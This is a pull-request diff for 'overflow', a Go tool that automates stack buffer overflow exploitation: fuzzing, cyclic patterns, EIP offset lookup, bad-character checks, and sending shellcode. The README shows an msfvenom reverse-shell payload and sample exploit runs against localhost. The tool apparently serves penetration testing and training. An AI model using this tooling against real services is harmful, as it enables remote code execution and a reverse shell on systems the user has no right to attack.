### PR TITLE
v1.2.0

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -4,6 +4,8 @@ DIST=./dist
 
 all: clean update test windows linux darwin
 
+release: all zip
+
 update:
 	@go get -u; \
 	go mod tidy -v
@@ -25,6 +27,13 @@ darwin:
 		mkdir -p $(DIST)/overflow-darwin-$$GOARCH; \
 		GOOS=darwin GOARCH=$$GOARCH GO111MODULE=on CGO_ENABLED=0 $(CC) -trimpath -o $(DIST)/overflow-darwin-$$GOARCH/overflow; \
 	done
+
+zip:
+	@zip -r overflow-all.zip $(DIST); \
+	for i in $(DIST)/*; do \
+		zip -r "$$i.zip" "$$i"; \
+	done; \
+	mv overflow-all.zip $(DIST)/overflow-all.zip
 
 test:
 	@go test ./...

--- a/README.md
+++ b/README.md
@@ -54,9 +54,9 @@ $ overflow help
 $ overflow (fuzz | pattern | chars | exploit) --help
 ```
 
-The required flags for every subcommand are "host" and "port". You can also
-specify any prefixes or suffixes to put before and after the payload, in the
-case that a menu or something is presented to you when you open the socket.
+The required flags for (almost) every subcommand are "host" and "port". You can
+also specify any prefixes or suffixes to put before and after the payload, in
+the case that a menu or something is presented to you when you open the socket.
 
 ### Fuzzing for Buffer Length
 Possibly the most important step in buffer overflow exploitation is finding the
@@ -71,6 +71,9 @@ The required flags are "host", "port" and "step".
 ```
 $ overflow fuzz (-H|--host HOST) (-P|--port PORT) (-S|--step STEP) [flags]
 ```
+
+Take a look at [Fuzzing for Buffer Length](#example-fuzz) for a more detailed
+example.
 
 ### Sending Cyclic Patterns
 Why would you want to do this? Well, sending a cyclic pattern of bytes to the
@@ -87,6 +90,24 @@ The required flags are "host", "port" and "length".
 $ overflow pattern (-H|--host HOST) (-P|--port PORT) (-l|--length LENGTH) [flags]
 ```
 
+Take a look at [Sending Cyclic Patterns](#example-pattern) for a more detailed
+example.
+
+### Getting the Offset from a Cyclic Pattern
+The next step after sending the cyclic pattern to the target service is using
+that pattern to find the various offsets to particular registers (one important
+register would be EIP). All we would have to do is pass value of the bytes that
+overwrote the register to the `offset` subcommand, and we would get the offset
+of that register.
+
+The only required flag is "query".
+```
+$ overflow offset (-q|--query QUERY) [flags]
+```
+
+Take a look at [Getting the Offset from a Cyclic Pattern](#example-offset) for
+a more detailed example.
+
 ### Sending Bad Characters
 An important part of buffer overflow exploitation is determining which
 characters are "bad", or which characters are treated differently by the target
@@ -101,6 +122,9 @@ Required flags are "host", "port" and "offset".
 $ overflow chars (-H|--host HOST) (-P|--port PORT) (-o|--offset OFFSET) [flags]
 ```
 
+Take a look at [Sending Bad Characters](#example-chars) for a more detailed
+example.
+
 ### Running Exploits
 Once you've found the offset of the EIP register, and a valid jump address, you
 can execute shellcode on the target service. The `exploit` subcommand provides
@@ -113,9 +137,12 @@ $ overflow exploit (-H|--host HOST) (-P|--port PORT) (-o|--offset OFFSET) \
     (-j|--jump JUMP) (-S|--shell SHELL) [flags]
 ```
 
+Take a look at [Running Exploits](#example-exploit) for a more detailed
+example.
+
 ## Examples
 
-### Fuzzing for Buffer Length
+### Fuzzing for Buffer Length <a name="example-fuzz"></a>
 Here's a quick example using this subcommand to fuzz for the length of the
 target buffer in 100-byte steps.
 ```
@@ -133,7 +160,7 @@ $ overflow fuzz -H 127.0.0.1 -P 4444 -S 100
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────
@@ -157,7 +184,7 @@ $ overflow fuzz -H 127.0.0.1 -P 4444 -S 100
  Success! Length of buffer is in range (400, 500].
 ```
 
-### Sending Cyclic patterns
+### Sending Cyclic patterns <a name="example-pattern"></a>
 Here's a quick example using this subcommand to send a 60-byte cyclic pattern
 to the target service.
 ```
@@ -175,7 +202,7 @@ $ overflow pattern -H 127.0.0.1 -P 4444 -l 65
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────
@@ -198,7 +225,42 @@ Connection from 127.0.0.1:48870
 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
 ```
 
-### Sending Bad Characters
+### Getting the Offset from a Cyclic Pattern <a name="example-offset"></a>
+Here's a quick example as to how you'd use the `offset` subcommand to find the
+location of a particular sub-pattern.
+
+Note that I'm using the `reverse` flag to let it know that the target system is
+little-endian so the bytes in the sub-pattern must be reversed.
+```
+$ overflow offset -rq "\x38\x6f\x43\x37"
+```
+```
+  ______   __   __ ______   ______
+ /\  __ \ /\ \ / //\  ___\ /\  == \
+ \ \ \/\ \\ \ \'/ \ \  __\ \ \  __< 
+  \ \_____\\ \__|  \ \_____\\ \_\ \_\
+   \/_____/ \/_/    \/_____/ \/_/ /_/
+      ______  __       ______   __     __
+     /\  ___\/\ \     /\  __ \ /\ \  _ \ \
+     \ \  __\\ \ \____\ \ \/\ \\ \ \/ ".\ \
+      \ \_\   \ \_____\\ \_____\\ \__/".~\_\
+       \/_/    \/_____/ \/_____/ \/_/   \/_/
+
+        v1.2.0
+
+ by Stephen Radley             github.com/sradley
+──────────────────────────────────────────────────
+ :: Query       : "\x38\x6f\x43\x37"
+ :: Reverse     : true
+ :: Length      : 0
+──────────────────────────────────────────────────
+ > Parsing query.
+ > Searching for query within pattern.
+
+ Success! Pattern offset is: 2003
+ ```
+
+### Sending Bad Characters <a name="example-chars"></a>
 Here's an example showing the use of this subcommand. Make sure you include the
 offset to the EIP register.
 ```
@@ -216,7 +278,7 @@ $ overflow chars -H 127.0.0.1 -P 4444 -o 160
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────
@@ -251,7 +313,7 @@ $ overflow chars -H 127.0.0.1 -P 4444 -o 160 -e "\x00\x41\xAB\x01"
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────
@@ -269,7 +331,7 @@ $ overflow chars -H 127.0.0.1 -P 4444 -o 160 -e "\x00\x41\xAB\x01"
  Success! No errors found.
 ```
 
-### Running Exploits
+### Running Exploits <a name="example-exploit"></a>
 Here's a brief example explaining how you can use the `exploit` subcommand to
 execute a payload generated by `msfvenom`.
 
@@ -280,10 +342,7 @@ $ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4321 \
 ```
 
 Then just use the tool as follows, ensuring you include the offset to the EIP
-register and the jump address in the format used below. Don't forget that if
-the target system is little-endian you need to write the jump address
-backwards (e.g. if the address is "\x01\x02\x03\x04", write it as
-"\x04\x03\x02\x01").
+register and the jump address in the format used in the example below.
 ```
 $ overflow exploit -H 127.0.0.1 -P 4444 -o 160 -j "\x5f\x4a\x35\x8f" -S path/to/payload.shell
 ```
@@ -299,7 +358,7 @@ $ overflow exploit -H 127.0.0.1 -P 4444 -o 160 -j "\x5f\x4a\x35\x8f" -S path/to/
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────
@@ -308,6 +367,7 @@ $ overflow exploit -H 127.0.0.1 -P 4444 -o 160 -j "\x5f\x4a\x35\x8f" -S path/to/
  :: Port        : 4444
  :: Offset      : 160
  :: Jump        : "\x5f\x4a\x35\x8f"
+ :: Reverse     : false
  :: NOPs        : 16
  :: Shell       : payload.shell
 ──────────────────────────────────────────────────
@@ -318,3 +378,11 @@ $ overflow exploit -H 127.0.0.1 -P 4444 -o 160 -j "\x5f\x4a\x35\x8f" -S path/to/
  
  Success! No errors found.
 ```
+
+Don't forget that if the target system is little-endian you need to write the
+jump address backwards (e.g. if the address is "\x01\x02\x03\x04", write it as
+"\x04\x03\x02\x01"). Alternatively, you can just specify the "reverse" flag.
+```
+$ overflow exploit ... -rj "\x01\x02\x03\x04" ...
+```
+

--- a/cmd/exploit/exploit.go
+++ b/cmd/exploit/exploit.go
@@ -8,14 +8,15 @@ import (
 
 // arguments taken by the exploit command
 var (
-    host   string
-    port   int
-    offset int
-    jump   string
-    nops   int
-    shell  string
-    pref   string
-    suff   string
+    host    string
+    port    int
+    offset  int
+    jump    string
+    reverse bool
+    nops    int
+    shell   string
+    pref    string
+    suff    string
 )
 
 // exploit command definition
@@ -53,6 +54,10 @@ func Init() {
         "the jump address for executing shellcode")
     Exploit.MarkFlagRequired("jump")
 
+    // reverse flag (optional)
+    Exploit.Flags().BoolVarP(&reverse, "reverse", "r", false,
+        "(optional) reverse the endianness of the jump address bytes")
+
     // nops flag (optional)
     Exploit.Flags().IntVarP(&nops, "nops", "n", 16,
         "(optional) the number of NOPs to pad payload with")
@@ -66,9 +71,10 @@ func Init() {
 // exploit command subroutine
 func exploit(cmd *cobra.Command, args []string) {
     // print the title card
-    cli.ExploitTitle(host, port, offset, jump, nops, shell)
+    cli.ExploitTitle(host, port, offset, jump, reverse, nops, shell)
 
     // run the exploit functionality
-    overflow.Exploit(host, port, offset, jump, nops, shell, pref, suff)
+    overflow.Exploit(host, port, offset, jump, reverse, nops, shell, pref,
+        suff)
 }
 

--- a/cmd/offset/offset.go
+++ b/cmd/offset/offset.go
@@ -1,0 +1,46 @@
+package offset
+
+import (
+    "github.com/spf13/cobra"
+    "github.com/sradley/overflow/internal/overflow"
+    "github.com/sradley/overflow/internal/cli"
+)
+
+// arguments taken by the offset command
+var (
+    query   string
+    reverse bool
+    length  int
+)
+
+// offset command definition
+var Offset = &cobra.Command{
+    Use:   "offset",
+    Short: "finds the offset of a given byte-value within a cyclic pattern",
+    Run:   offset,
+}
+
+// initialisation function for all arguments taken by the offset command
+func Init() {
+    // query flag (required)
+    Offset.Flags().StringVarP(&query, "query", "q", "",
+        "series of bytes to find the offset of within the pattern")
+    Offset.MarkFlagRequired("query")
+
+    // reverse flag (optional)
+    Offset.Flags().BoolVarP(&reverse, "reverse", "r", false,
+        "(optional) reverse the endianness of the query bytes")
+
+    // length flag (optional)
+    Offset.Flags().IntVarP(&length, "length", "l", 0,
+        "(optional) the length of the cyclic pattern sent to the target")
+}
+
+// offset command subroutine
+func offset(cmd *cobra.Command, args []string) {
+    // print the title card
+    cli.OffsetTitle(query, reverse, length)
+
+    // run the offset functionality 
+    overflow.Offset(query, reverse, length)
+}

--- a/cmd/overflow.go
+++ b/cmd/overflow.go
@@ -5,6 +5,7 @@ import (
     "github.com/spf13/cobra"
     "github.com/sradley/overflow/cmd/fuzz"
     "github.com/sradley/overflow/cmd/pattern"
+    "github.com/sradley/overflow/cmd/offset"
     "github.com/sradley/overflow/cmd/chars"
     "github.com/sradley/overflow/cmd/exploit"
 )
@@ -31,6 +32,10 @@ func init() {
     // initialise pattern subcommand
     root.AddCommand(pattern.Pattern)
     pattern.Init()
+
+    // initialise the offset subcommand
+    root.AddCommand(offset.Offset)
+    offset.Init()
 
     // initialise chars subcommand
     root.AddCommand(chars.Chars)

--- a/internal/cli/cli.go
+++ b/internal/cli/cli.go
@@ -17,7 +17,7 @@ var title = `
       \ \_\   \ \_____\\ \_____\\ \__/".~\_\
        \/_/    \/_____/ \/_____/ \/_/   \/_/
 
-        v1.1.1
+        v1.2.0
 
  by Stephen Radley             github.com/sradley
 ──────────────────────────────────────────────────`
@@ -41,6 +41,14 @@ var pattern = `
 ──────────────────────────────────────────────────
 `
 
+// offset command specific arguments template
+var offset = `
+ :: Query       : "%s"
+ :: Reverse     : %t
+ :: Length      : %d
+──────────────────────────────────────────────────
+`
+
 // chars command specific arguments template
 var chars = `
  :: Offset      : %d
@@ -52,6 +60,7 @@ var chars = `
 var exploit = `
  :: Offset      : %d
  :: Jump        : "%s"
+ :: Reverse     : %t
  :: NOPs        : %d
  :: Shell       : %s
 ──────────────────────────────────────────────────
@@ -81,6 +90,15 @@ func PatternTitle(host string, port int, length int) {
     fmt.Printf(pattern, length)
 }
 
+// prints the title when executing the offset command
+func OffsetTitle(query string, reverse bool, length int) {
+    // print the title
+    fmt.Print(title)
+
+    // print the arguments passed to offset
+    fmt.Printf(offset, query, reverse, length)
+}
+
 // prints the title when executing the chars command
 func CharsTitle(host string, port int, offset int, exclude string) {
     // print the title
@@ -94,8 +112,8 @@ func CharsTitle(host string, port int, offset int, exclude string) {
 }
 
 // prints the title when executing the exploit command
-func ExploitTitle(host string, port int, offset int, jump string, nops int,
-        shell string) {
+func ExploitTitle(host string, port int, offset int, jump string, reverse bool,
+        nops int, shell string) {
     // print the title
     fmt.Print(title)
 
@@ -103,6 +121,6 @@ func ExploitTitle(host string, port int, offset int, jump string, nops int,
     fmt.Printf(base, "exploit", host, port)
 
     // print the arguments passed to exploit
-    fmt.Printf(exploit, offset, jump, nops, shell)
+    fmt.Printf(exploit, offset, jump, reverse, nops, shell)
 }
 

--- a/internal/overflow/chars_test.go
+++ b/internal/overflow/chars_test.go
@@ -1,0 +1,46 @@
+package overflow
+
+import (
+    "testing"
+)
+
+// tests characters generation with no exclusions
+func TestGenerateCharactersNoExclude(t *testing.T) {
+    // generate characters
+    data := generateCharacters([]byte{})
+
+    // if not all characters in array, test failed
+    if len(data) != 256 {
+        t. Errorf("len(characters([]byte{}) = %d, want %d", len(data), 256)
+    }
+}
+
+// tests characters generation with some exclusions
+func TestGenerateCharactersSmallExclude(t *testing.T) {
+    // generate characters with some exclusions
+    exclude := []byte{1, 2, 3, 4, 5}
+    data := generateCharacters(exclude)
+
+    // if lengths don't match, test failed
+    if len(data) != 256 - len(exclude) {
+        t.Errorf("len(characters(exclude) = %d, want %d", len(data),
+            256 - len(exclude))
+    }
+}
+
+// tests characters generation with a lot of exclusions
+func TestGenerateCharactersLargeExclude(t *testing.T) {
+    // generate characters with a lot of exclusions
+    exclude := []byte{
+         1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 13, 14, 15, 16,
+        17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
+        32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46,
+    }
+    data := generateCharacters(exclude)
+
+    // if lengths don't match, test failed
+    if len(data) != 256 - len(exclude) {
+        t.Errorf("len(characters(exclude) = %d, want %d", len(data),
+            256 - len(exclude))
+    }
+}

--- a/internal/overflow/exploit.go
+++ b/internal/overflow/exploit.go
@@ -7,8 +7,8 @@ import (
 )
 
 // the main functionality of the exploit subroutine
-func Exploit(host string, port int, offset int, jump string, nops int,
-        shell string, pref, suff string) {
+func Exploit(host string, port int, offset int, jump string, reverse bool,
+        nops int, shell string, pref, suff string) {
     // generate overflow and nopslide
     pad := generateBytes(0x41, offset)
     slide := generateBytes(0x90, nops)
@@ -25,6 +25,11 @@ func Exploit(host string, port int, offset int, jump string, nops int,
     if err != nil {
         fmt.Printf("\n Error! invalid jump address '%s'\n", jump)
         return
+    }
+
+    // reverse endianness if specified
+    if reverse {
+        reverseBytes(addr)
     }
 
     // read shell

--- a/internal/overflow/fuzz.go
+++ b/internal/overflow/fuzz.go
@@ -34,6 +34,6 @@ func Fuzz(host string, port int, step int, wait int, pref, suff string) {
 
     // print buffer information
     fmt.Printf("\n Success! Length of buffer is in range (%d, %d].\n",
-        length - step, length)
+        length - step - step, length - step)
 }
 

--- a/internal/overflow/offset.go
+++ b/internal/overflow/offset.go
@@ -5,7 +5,7 @@ import (
     "strings"
 )
 
-// ...
+// length of the cyclic pattern before it starts to repeat
 const maxPatternLen int = 20280
 
 // the main functionality of the offset subroutine 
@@ -43,9 +43,13 @@ func Offset(query string, reverse bool, length int) {
     fmt.Printf("\n Success! Pattern offset is: %d\n", result)
 }
 
-// ...
+// find the offset of the given sub-pattern
 func findSubPattern(query string, length int) int {
-    // ...
+    if len(query) == 0 {
+        return -1
+    }
+
+    // generate the whole pattern
     var pstr string
     if length > 0 {
         pstr = string(cyclicPattern(length))
@@ -53,7 +57,7 @@ func findSubPattern(query string, length int) int {
         pstr = string(cyclicPattern(maxPatternLen))
     }
 
-    // ...
+    // find the last occurrence of the sub-pattern within the pattern
     return strings.LastIndex(pstr, query)
 }
 

--- a/internal/overflow/offset.go
+++ b/internal/overflow/offset.go
@@ -1,0 +1,59 @@
+package overflow
+
+import (
+    "fmt"
+    "strings"
+)
+
+// ...
+const maxPatternLen int = 20280
+
+// the main functionality of the offset subroutine 
+func Offset(query string, reverse bool, length int) {
+    // parse the bytes in the sub-pattern
+    fmt.Println(" > Parsing query.")
+    if len(query) != 16 {
+        fmt.Printf("\n Error! invalid query length '%s'\n", query)
+        return
+    }
+
+    // decode jump address
+    addr, err := parseHex(query)
+    if err != nil {
+        fmt.Printf("\n Error! invalid bytes in query '%s'\n", query)
+        return
+    }
+
+    // reverse endianness if specified
+    if reverse {
+        reverseBytes(addr)
+    }
+
+    // attempt to find the pattern offset
+    fmt.Println(" > Searching for query within pattern.")
+    result := findSubPattern(string(addr), length)
+
+    // if no pattern offset found, print error
+    if result == -1 {
+        fmt.Println("\n Error! sub-pattern not found")
+        return
+    }
+
+    // otherwise, print the offset of the pattern
+    fmt.Printf("\n Success! Pattern offset is: %d\n", result)
+}
+
+// ...
+func findSubPattern(query string, length int) int {
+    // ...
+    var pstr string
+    if length > 0 {
+        pstr = string(cyclicPattern(length))
+    } else {
+        pstr = string(cyclicPattern(maxPatternLen))
+    }
+
+    // ...
+    return strings.LastIndex(pstr, query)
+}
+

--- a/internal/overflow/offset_test.go
+++ b/internal/overflow/offset_test.go
@@ -4,52 +4,63 @@ import (
     "testing"
 )
 
-// ...
+// tests attempting to find an empty sub-pattern with no length specified
 func TestFindSubPatternEmpty(t *testing.T) {
-    t.Errorf("test not implemented")
+    // attempt to find an empty sub-pattern
+    data := findSubPattern("", 0)
+
+    if data != -1 {
+        t.Errorf("data = %d, want %d", data, -1)
+    }
 }
 
-// ...
+// tests attempting to find an empty sub-pattern with a length specified
 func TestFindSubPatternEmptyWithLength(t *testing.T) {
-    t.Errorf("test not implemented")
+    // attempt to find an empty sub-pattern with length
+    data := findSubPattern("", 3000)
+
+    if data != -1 {
+        t.Errorf("data = %d, want %d", data, -1)
+    }
 }
 
-// ...
+// tests finding a valid sub-pattern with no length specified
 func TestFindSubPatternSmallValid(t *testing.T) {
-    t.Errorf("test not implemented")
+    // attempt to find a valid sub-pattern
+    data := findSubPattern("7Co8", 0)
+
+    if data != 2003 {
+        t.Errorf("data = %d, want %d", data, 2003)
+    }
 }
 
-// ...
+// tests finding a valid sub-pattern with a length specified
 func TestFindSubPatternSmallWithLengthValid(t *testing.T) {
-    t.Errorf("test not implemented")
+    // attempt to find a valid sub-pattern with length
+    data := findSubPattern("7Co8", 3000)
+
+    if data != 2003 {
+        t.Errorf("data = %d, want %d", data, 2003)
+    }
 }
 
-// ...
-func TestFindSubPatternSmallInvalid(t *testing.T) {
-    t.Errorf("test not implemented")
+// tests finding an invalid sub-pattern with no length specified
+func TestFindSubPatternInvalid(t *testing.T) {
+    // attempt to find an invalid sub-pattern
+    data := findSubPattern("abcd", 0)
+
+    if data != -1 {
+        t.Errorf("data = %d, want %d", data, -1)
+    }
 }
 
-// ...
-func TestFindSubPatternSmallWithLengthInvalid(t *testing.T) {
-    t.Errorf("test not implemented")
+// tests finding an invalid sub-pattern with a length specified
+func TestFindSubPatternWithLengthInvalid(t *testing.T) {
+    // attempt to find an invalid sub-pattern with length
+    data := findSubPattern("abcd", 3000)
+
+    if data != -1 {
+        t.Errorf("data = %d, want %d", data, -1)
+    }
 }
 
-// ...
-func TestFindSubPatternLargeValid(t *testing.T) {
-    t.Errorf("test not implemented")
-}
-
-// ...
-func TestFindSubPatternLargeWithLengthValid(t *testing.T) {
-    t.Errorf("test not implemented")
-}
-
-// ...
-func TestFindSubPatternLargeInvalid(t *testing.T) {
-    t.Errorf("test not implemented")
-}
-
-// ...
-func TestFindSubPatternLargeWithLengthInvalid(t *testing.T) {
-    t.Errorf("test not implemented")
-}

--- a/internal/overflow/offset_test.go
+++ b/internal/overflow/offset_test.go
@@ -1,0 +1,55 @@
+package overflow
+
+import (
+    "testing"
+)
+
+// ...
+func TestFindSubPatternEmpty(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternEmptyWithLength(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternSmallValid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternSmallWithLengthValid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternSmallInvalid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternSmallWithLengthInvalid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternLargeValid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternLargeWithLengthValid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternLargeInvalid(t *testing.T) {
+    t.Errorf("test not implemented")
+}
+
+// ...
+func TestFindSubPatternLargeWithLengthInvalid(t *testing.T) {
+    t.Errorf("test not implemented")
+}

--- a/internal/overflow/overflow.go
+++ b/internal/overflow/overflow.go
@@ -78,3 +78,11 @@ func parseHex(exclude string) ([]byte, error) {
     return data, nil
 }
 
+// reverses a given bytearray
+func reverseBytes(bytes []byte) {
+    // ...
+    for i, j := 0, len(bytes) - 1; i < j; i, j = i + 1, j - 1 {
+        bytes[i], bytes[j] = bytes[j], bytes[i]
+    }
+}
+

--- a/internal/overflow/overflow_test.go
+++ b/internal/overflow/overflow_test.go
@@ -148,16 +148,40 @@ func TestParseHexInvalid(t *testing.T) {
 
 // test reversing empty byte array
 func TestReverseBytesEmpty(t *testing.T) {
-    t.Errorf("test not implemented")
+    // reverse empty byte array
+    data := []byte{}
+    reverseBytes(data)
+
+    // if data not empty, test failed
+    if len(data) != 0 {
+        t.Errorf("len(data) = %d, want %d", len(data), 0)
+    }
 }
 
 // test reversing small byte array
 func TestReverseBytesSmall(t *testing.T) {
-    t.Errorf("test not implemented")
+    // reverse small byte array
+    data := []byte{0x41, 0x42, 0x43, 0x44}
+    reverseBytes(data)
+
+    if string(data) != "DCBA" {
+        t.Errorf("string(data) = %s, want %s", string(data), "DCBA")
+    }
 }
 
 // test reversing large byte array
 func TestReverseBytesLarge(t *testing.T) {
-    t.Errorf("test not implemented")
+    // reverse large byte array
+    data := []byte{
+        0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4a,
+        0x4b, 0x4c, 0x4d, 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54,
+        0x55, 0x56, 0x57, 0x58, 0x59, 0x5a,
+    }
+    reverseBytes(data)
+
+    if string(data) != "ZYXWVUTSRQPONMLKJIHGFEDCBA" {
+        t.Errorf("string(data) = %s, want %s", string(data),
+            "ZYXWVUTSRQPONMLKJIHGFEDCBA")
+    }
 }
 

--- a/internal/overflow/overflow_test.go
+++ b/internal/overflow/overflow_test.go
@@ -4,8 +4,6 @@ import (
     "testing"
 )
 
-// ---------------------------- overflow.go tests -----------------------------
-
 // tests creating an empty payload
 func TestCreatePayloadEmpty(t *testing.T) {
     // create an empty payload
@@ -148,143 +146,18 @@ func TestParseHexInvalid(t *testing.T) {
     }
 }
 
-// ------------------------------ chars.go tests ------------------------------
-
-// tests characters generation with no exclusions
-func TestGenerateCharactersNoExclude(t *testing.T) {
-    // generate characters
-    data := generateCharacters([]byte{})
-
-    // if not all characters in array, test failed
-    if len(data) != 256 {
-        t. Errorf("len(characters([]byte{}) = %d, want %d", len(data), 256)
-    }
+// test reversing empty byte array
+func TestReverseBytesEmpty(t *testing.T) {
+    t.Errorf("test not implemented")
 }
 
-// tests characters generation with some exclusions
-func TestGenerateCharactersSmallExclude(t *testing.T) {
-    // generate characters with some exclusions
-    exclude := []byte{1, 2, 3, 4, 5}
-    data := generateCharacters(exclude)
-
-    // if lengths don't match, test failed
-    if len(data) != 256 - len(exclude) {
-        t.Errorf("len(characters(exclude) = %d, want %d", len(data),
-            256 - len(exclude))
-    }
+// test reversing small byte array
+func TestReverseBytesSmall(t *testing.T) {
+    t.Errorf("test not implemented")
 }
 
-// tests characters generation with a lot of exclusions
-func TestGenerateCharactersLargeExclude(t *testing.T) {
-    // generate characters with a lot of exclusions
-    exclude := []byte{
-         1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 13, 14, 15, 16,
-        17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
-        32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46,
-    }
-    data := generateCharacters(exclude)
-
-    // if lengths don't match, test failed
-    if len(data) != 256 - len(exclude) {
-        t.Errorf("len(characters(exclude) = %d, want %d", len(data),
-            256 - len(exclude))
-    }
-}
-
-// ----------------------------- pattern.go tests ----------------------------- 
-
-// tests generating an empty cyclic pattern of bytes
-func TestCyclicPatternEmpty(t *testing.T) {
-    // generate empty cyclic pattern of bytes
-    want := ""
-    data := cyclicPattern(0)
-
-    // if strings don't match, test failed
-    if string(data) != want {
-        t.Errorf("string(data) = %s, want %s", string(data), want)
-    }
-}
-
-// tests generating a small cyclic pattern of bytes
-func TestCyclicPatternSmall(t *testing.T) {
-    // generate small cyclic pattern of bytes
-    want := "Aa0Aa1Aa2A"
-    data := cyclicPattern(10)
-
-    // if strings don't match, test failed
-    if string(data) != want {
-        t.Errorf("string(data) = %s, want %s", string(data), want)
-    }
-}
-
-// tests generating a large cyclic pattern of bytes
-func TestCyclicPatternLarge(t *testing.T) {
-    // generate large cyclic pattern of bytes
-    want := "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0" +
-            "Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1" +
-            "Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2" +
-            "Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3" +
-            "Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4" +
-            "Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5" +
-            "Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6" +
-            "Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7" +
-            "Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8" +
-            "As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9" +
-            "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0" +
-            "Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1" +
-            "Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2" +
-            "Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3" +
-            "Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4" +
-            "Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
-    data := cyclicPattern(1000)
-
-    // if strings don't match, test failed
-    if string(data) != want {
-        t.Errorf("string(data) = %s, want %s", string(data), want)
-    }
-}
-
-// tests generating the next cycle, with no rollover
-func TestNextCycleSimple(t *testing.T) {
-    // generate next cycle
-    x, y, z := nextCycle(65, 97, 51)
-
-    // if results don't match, test failed
-    if x != 65 || y != 97 || z != 52 {
-        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 97, 52)
-    }
-}
-
-// tests generating the next cycle, with a rollover on z
-func TestNextCycleRollZ(t *testing.T) {
-    // generate next cycle
-    x, y, z := nextCycle(65, 97, 57)
-
-    // if results don't match, test failed
-    if x != 65 || y != 98 || z != 48 {
-        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 98, 48)
-    }
-}
-
-// tests generating the next cycle, with rollovers on z and y
-func TestNextCycleRollY(t *testing.T) {
-    // generate next cycle
-    x, y, z := nextCycle(65, 122, 57)
-
-    // if results don't match, test failed
